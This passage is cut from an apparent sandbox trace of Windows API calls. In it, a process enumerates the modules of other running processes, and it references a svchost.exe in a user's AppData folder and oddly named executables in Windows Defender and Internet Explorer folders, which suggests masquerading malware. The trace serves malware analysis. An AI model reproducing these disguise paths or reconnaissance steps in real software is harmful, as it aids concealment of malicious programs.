lpmodinfo=0x25c8c30*(lpBaseOfDll=0x7fefd780000, SizeOfImage=0xf000, EntryPoint=0x7fefd7819b0)) returned 1 [0074.367] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd780000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="profapi.dll") returned 0xb [0074.371] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd780000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")) returned 0x1f [0074.374] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefac20000, lpmodinfo=0x25cae08, cb=0x18 | out: lpmodinfo=0x25cae08*(lpBaseOfDll=0x7fefac20000, SizeOfImage=0x11000, EntryPoint=0x7fefac216ac)) returned 1 [0074.378] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefac20000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="dhcpcsvc6.DLL") returned 0xd [0074.381] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefac20000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dhcpcsvc6.DLL" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")) returned 0x21 [0074.384] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefac00000, lpmodinfo=0x25ccfd8, cb=0x18 | out: lpmodinfo=0x25ccfd8*(lpBaseOfDll=0x7fefac00000, SizeOfImage=0x18000, EntryPoint=0x7fefac01bf8)) returned 1 [0074.387] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefac00000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="dhcpcsvc.DLL") returned 0xc [0074.391] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefac00000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dhcpcsvc.DLL" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")) returned 0x20 [0074.394] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefca10000, lpmodinfo=0x25cf1a8, cb=0x18 | out: lpmodinfo=0x25cf1a8*(lpBaseOfDll=0x7fefca10000, SizeOfImage=0x7000, EntryPoint=0x7fefca114b0)) returned 1 [0074.397] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefca10000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wshtcpip.dll") returned 0xc [0074.400] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefca10000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wshtcpip.dll" (normalized: "c:\\windows\\system32\\wshtcpip.dll")) returned 0x20 [0074.404] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef2890000, lpmodinfo=0x25d1378, cb=0x18 | out: lpmodinfo=0x25d1378*(lpBaseOfDll=0x7fef2890000, SizeOfImage=0x32000, EntryPoint=0x7fef2891060)) returned 1 [0074.407] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef2890000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="dssenh.dll") returned 0xa [0074.411] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef2890000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dssenh.dll" (normalized: "c:\\windows\\system32\\dssenh.dll")) returned 0x1e [0074.414] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefcb00000, lpmodinfo=0x25d3538, cb=0x18 | out: lpmodinfo=0x25d3538*(lpBaseOfDll=0x7fefcb00000, SizeOfImage=0x1b000, EntryPoint=0x7fefcb02068)) returned 1 [0074.418] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefcb00000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="GPAPI.dll") returned 0x9 [0074.422] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefcb00000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GPAPI.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")) returned 0x1d [0074.425] CloseHandle (hObject=0x214) returned 1 [0074.434] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8e4) returned 0x214 [0074.434] EnumProcessModules (in: hProcess=0x214, lphModule=0x25d6ff8, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x25d6ff8, lpcbNeeded=0x23ee40) returned 1 [0074.434] GetModuleInformation (in: hProcess=0x214, hModule=0x2a0000, lpmodinfo=0x25d7268, cb=0x18 | out: lpmodinfo=0x25d7268*(lpBaseOfDll=0x2a0000, SizeOfImage=0x17000, EntryPoint=0x2a14a1)) returned 1 [0074.435] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x2a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="utg2.exe") returned 0x8 [0074.435] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x2a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Windows Defender\\utg2.exe" (normalized: "c:\\program files (x86)\\windows defender\\utg2.exe")) returned 0x30 [0074.435] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x25d9488, cb=0x18 | out: lpmodinfo=0x25d9488*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0074.436] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0074.436] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0074.436] GetModuleInformation (in: hProcess=0x214, hModule=0x75300000, lpmodinfo=0x25db648, cb=0x18 | out: lpmodinfo=0x25db648*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0074.437] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75300000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0074.437] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75300000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0074.437] GetModuleInformation (in: hProcess=0x214, hModule=0x752a0000, lpmodinfo=0x25dd808, cb=0x18 | out: lpmodinfo=0x25dd808*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0074.438] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x752a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0074.438] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x752a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0074.439] GetModuleInformation (in: hProcess=0x214, hModule=0x75290000, lpmodinfo=0x25df9d8, cb=0x18 | out: lpmodinfo=0x25df9d8*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0074.439] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75290000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0074.440] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75290000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0074.440] CloseHandle (hObject=0x214) returned 1 [0074.441] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x988) returned 0x214 [0074.441] EnumProcessModules (in: hProcess=0x214, lphModule=0x25e20f8, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x25e20f8, lpcbNeeded=0x23ee40) returned 1 [0074.442] GetModuleInformation (in: hProcess=0x214, hModule=0x1200000, lpmodinfo=0x25e2368, cb=0x18 | out: lpmodinfo=0x25e2368*(lpBaseOfDll=0x1200000, SizeOfImage=0x17000, EntryPoint=0x12014a1)) returned 1 [0074.442] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x1200000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="outside.exe") returned 0xb [0074.442] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x1200000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Internet Explorer\\outside.exe" (normalized: "c:\\program files (x86)\\internet explorer\\outside.exe")) returned 0x34 [0074.443] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x25e4590, cb=0x18 | out: lpmodinfo=0x25e4590*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0074.443] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0074.444] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0074.444] GetModuleInformation (in: hProcess=0x214, hModule=0x75300000, lpmodinfo=0x25e6750, cb=0x18 | out: lpmodinfo=0x25e6750*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0074.444] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75300000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0074.445] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75300000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0074.445] GetModuleInformation (in: hProcess=0x214, hModule=0x752a0000, lpmodinfo=0x25e8910, cb=0x18 | out: lpmodinfo=0x25e8910*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0074.446] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x752a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0074.446] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x752a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0074.447] GetModuleInformation (in: hProcess=0x214, hModule=0x75290000, lpmodinfo=0x25eaae0, cb=0x18 | out: lpmodinfo=0x25eaae0*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0074.448] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75290000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0074.448] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75290000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0074.449] CloseHandle (hObject=0x214) returned 1 [0074.450] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa4c) returned 0x214 [0074.450] EnumProcessModules (in: hProcess=0x214, lphModule=0x25ed218, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x25ed218, lpcbNeeded=0x23ee40) returned 1 [0074.451] GetModuleInformation (in: hProcess=0x214, hModule=0x9e0000, lpmodinfo=0x25ed488, cb=0x18 | out: lpmodinfo=0x25ed488*(lpBaseOfDll=0x9e0000, SizeOfImage=0x17000, EntryPoint=0x9e14a1)) returned 1 [0074.451] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x9e0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="creditservice.exe") returned 0x11 [0074.451] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x9e0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Windows NT\\creditservice.exe" (normalized: "c:\\program files (x86)\\windows nt\\creditservice.exe")) returned 0x33 [0074.452] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x25ef6b8, cb=0x18 | out: lpmodinfo=0x25ef6b8*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0074.452] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0074.452] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0074.453] GetModuleInformation (in: hProcess=0x214, hModule=0x75300000, lpmodinfo=0x25f1878, cb=0x18 | out: lpmodinfo=0x25f1878*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0074.453] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75300000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0074.454] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75300000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0074.454] GetModuleInformation (in: hProcess=0x214, hModule=0x752a0000, lpmodinfo=0x25f3a38, cb=0x18 | out: lpmodinfo=0x25f3a38*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0074.455] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x752a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0074.455] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x752a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0074.455] GetModuleInformation (in: hProcess=0x214, hModule=0x75290000, lpmodinfo=0x25f5c08, cb=0x18 | out: lpmodinfo=0x25f5c08*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0074.458] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.458] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75290000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0074.459] CoTaskMemFree (pv=0xd910e0) [0074.459] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.459] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75290000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0074.460] CoTaskMemFree (pv=0xd910e0) [0074.460] CloseHandle (hObject=0x214) returned 1 [0074.461] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0074.461] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x298) returned 0x214 [0074.461] EnumProcessModules (in: hProcess=0x214, lphModule=0x2407710, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x2407710, lpcbNeeded=0x23ee40) returned 1 [0074.463] GetModuleInformation (in: hProcess=0x214, hModule=0xff760000, lpmodinfo=0x2407980, cb=0x18 | out: lpmodinfo=0x2407980*(lpBaseOfDll=0xff760000, SizeOfImage=0xb000, EntryPoint=0xff76246c)) returned 1 [0074.464] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.464] GetModuleBaseNameW (in: hProcess=0x214, hModule=0xff760000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="svchost.exe") returned 0xb [0074.464] CoTaskMemFree (pv=0xd910e0) [0074.464] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.464] GetModuleFileNameExW (in: hProcess=0x214, hModule=0xff760000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")) returned 0x1f [0074.465] CoTaskMemFree (pv=0xd910e0) [0074.465] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x2409b78, cb=0x18 | out: lpmodinfo=0x2409b78*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0074.465] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.465] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0074.466] CoTaskMemFree (pv=0xd910e0) [0074.466] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.466] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0074.466] CoTaskMemFree (pv=0xd910e0) [0074.466] GetModuleInformation (in: hProcess=0x214, hModule=0x77710000, lpmodinfo=0x240bd38, cb=0x18 | out: lpmodinfo=0x240bd38*(lpBaseOfDll=0x77710000, SizeOfImage=0x11f000, EntryPoint=0x77725340)) returned 1 [0074.467] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.467] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77710000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="kernel32.dll") returned 0xc [0074.467] CoTaskMemFree (pv=0xd910e0) [0074.467] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.467] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77710000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0074.468] CoTaskMemFree (pv=0xd910e0) [0074.468] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd910000, lpmodinfo=0x240df08, cb=0x18 | out: lpmodinfo=0x240df08*(lpBaseOfDll=0x7fefd910000, SizeOfImage=0x6c000, EntryPoint=0x7fefd912780)) returned 1 [0074.468] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.468] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd910000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0074.469] CoTaskMemFree (pv=0xd910e0) [0074.469] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.469] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd910000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0074.470] CoTaskMemFree (pv=0xd910e0) [0074.470] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff100000, lpmodinfo=0x24100d8, cb=0x18 | out: lpmodinfo=0x24100d8*(lpBaseOfDll=0x7feff100000, SizeOfImage=0x9f000, EntryPoint=0x7feff1025a0)) returned 1 [0074.470] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.470] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff100000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0074.471] CoTaskMemFree (pv=0xd910e0) [0074.471] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.471] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff100000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0074.471] CoTaskMemFree (pv=0xd910e0) [0074.471] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefee80000, lpmodinfo=0x24122f0, cb=0x18 | out: lpmodinfo=0x24122f0*(lpBaseOfDll=0x7fefee80000, SizeOfImage=0x1f000, EntryPoint=0x7fefee860e8)) returned 1 [0074.472] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.472] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefee80000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0074.473] CoTaskMemFree (pv=0xd910e0) [0074.473] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.473] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefee80000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0074.473] CoTaskMemFree (pv=0xd910e0) [0074.473] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefdb50000, lpmodinfo=0x24144b0, cb=0x18 | out: lpmodinfo=0x24144b0*(lpBaseOfDll=0x7fefdb50000, SizeOfImage=0x12d000, EntryPoint=0x7fefdb9ed50)) returned 1 [0074.474] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.474] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefdb50000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0074.475] CoTaskMemFree (pv=0xd910e0) [0074.475] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.475] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefdb50000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0074.475] CoTaskMemFree (pv=0xd910e0) [0074.475] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefca20000, lpmodinfo=0x2416670, cb=0x18 | out: lpmodinfo=0x2416670*(lpBaseOfDll=0x7fefca20000, SizeOfImage=0x14000, EntryPoint=0x7fefca2101c)) returned 1 [0074.476] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.476] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefca20000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="rpcepmap.dll") returned 0xc [0074.477] CoTaskMemFree (pv=0xd910e0) [0074.477] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.477] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefca20000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\rpcepmap.dll" (normalized: "c:\\windows\\system32\\rpcepmap.dll")) returned 0x20 [0074.478] CoTaskMemFree (pv=0xd910e0) [0074.478] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd760000, lpmodinfo=0x2418840, cb=0x18 | out: lpmodinfo=0x2418840*(lpBaseOfDll=0x7fefd760000, SizeOfImage=0x14000, EntryPoint=0x7fefd7610e0)) returned 1 [0074.479] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.479] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd760000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="RpcRtRemote.dll") returned 0xf [0074.480] CoTaskMemFree (pv=0xd910e0) [0074.480] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.480] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd760000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")) returned 0x23 [0074.480] CoTaskMemFree (pv=0xd910e0) [0074.480] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd610000, lpmodinfo=0x241aaa8, cb=0x18 | out: lpmodinfo=0x241aaa8*(lpBaseOfDll=0x7fefd610000, SizeOfImage=0xb000, EntryPoint=0x7fefd611030)) returned 1 [0074.481] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.481] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd610000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="secur32.dll") returned 0xb [0074.482] CoTaskMemFree (pv=0xd910e0) [0074.482] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.482] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd610000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")) returned 0x1f [0074.483] CoTaskMemFree (pv=0xd910e0) [0074.483] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd640000, lpmodinfo=0x241cc68, cb=0x18 | out: lpmodinfo=0x241cc68*(lpBaseOfDll=0x7fefd640000, SizeOfImage=0x25000, EntryPoint=0x7fefd649658)) returned 1 [0074.484] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.484] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd640000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="SSPICLI.DLL") returned 0xb [0074.485] CoTaskMemFree (pv=0xd910e0) [0074.485] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.485] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd640000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SSPICLI.DLL" (normalized: "c:\\windows\\system32\\sspicli.dll")) returned 0x1f [0074.486] CoTaskMemFree (pv=0xd910e0) [0074.486] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefcc70000, lpmodinfo=0x241ee28, cb=0x18 | out: lpmodinfo=0x241ee28*(lpBaseOfDll=0x7fefcc70000, SizeOfImage=0xa000, EntryPoint=0x7fefcc73cb8)) returned 1 [0074.487] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.487] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefcc70000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="credssp.dll") returned 0xb [0074.488] CoTaskMemFree (pv=0xd910e0) [0074.488] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.488] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefcc70000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")) returned 0x1f [0074.489] CoTaskMemFree (pv=0xd910e0) [0074.489] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd670000, lpmodinfo=0x2420fe8, cb=0x18 | out: lpmodinfo=0x2420fe8*(lpBaseOfDll=0x7fefd670000, SizeOfImage=0xf000, EntryPoint=0x7fefd671010)) returned 1 [0074.490] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.490] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd670000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0074.491] CoTaskMemFree (pv=0xd910e0) [0074.491] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.491] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd670000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTBASE.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")) returned 0x21 [0074.492] CoTaskMemFree (pv=0xd910e0) [0074.493] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefca40000, lpmodinfo=0x24231d0, cb=0x18 | out: lpmodinfo=0x24231d0*(lpBaseOfDll=0x7fefca40000, SizeOfImage=0x81000, EntryPoint=0x7fefca4cec8)) returned 1 [0074.494] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.494] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefca40000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="rpcss.dll") returned 0x9 [0074.495] CoTaskMemFree (pv=0xd910e0) [0074.495] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0074.495] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefca40000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")) returned 0x1d [0074.496] CoTaskMemFree (pv=0xd910e0) [0074.496] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff430000, lpmodinfo=0x2425390, cb=0x18 | out: lpmodinfo=0x2425390*(lpBaseOfDll=0x7feff430000, SizeOfImage=0xdb000, 